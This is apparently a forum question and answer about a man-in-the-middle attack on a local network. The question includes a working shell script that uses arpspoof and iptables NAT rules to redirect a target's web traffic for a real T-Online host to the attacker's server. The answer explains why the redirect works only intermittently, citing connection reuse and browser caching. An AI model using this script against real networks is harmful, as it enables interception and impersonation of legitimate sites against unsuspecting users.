Problem :
I’m trying to do a man-in-the-middle attack on my local network and I’m trying to replace the navigationshilfe1.t-online.de server with my own server. Later I want to replace a custom service instead of an http service. My current scripts looks like:
sysctl -w net.ipv4.ip_forward=1
export TARGET=192.168.2.104
export ATTACKER=192.168.2.115
export GATEWAY=192.168.2.1
export SITE=62.138.238.45 # navigationshilfe1.t-online.de
iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -d $SITE -j DNAT --to-destination $ATTACKER:80
iptables -t nat -A POSTROUTING -p tcp -s $ATTACKER --source-port 80 -j SNAT --to-source $SITE:80
iptables -t nat -L -n -v
arpspoof -i eth0 -c both -t $TARGET -r $GATEWAY
The problem is that sometimes the web browser of the target is showing the real site and if I refresh the page a few times it shows the fake one and vice versa. Does anybody know why or is the connection just bad?
Solution :
There are a few possibilites
Note that iptables nat rules only work on the first packet of a connection. Once a connection is established the internal mapping tables are used.
Browsers re-use connections to save connection setup overhead. So if your browser still has open connections from before you added the rules requests on those connections will not be diverted.
Another possibility is that you are seeing the affects of caching in the browser. Browsers will often do a “conditional get” which only redownloads the page if the timestamps indicate it has changed since the client last downloaded it.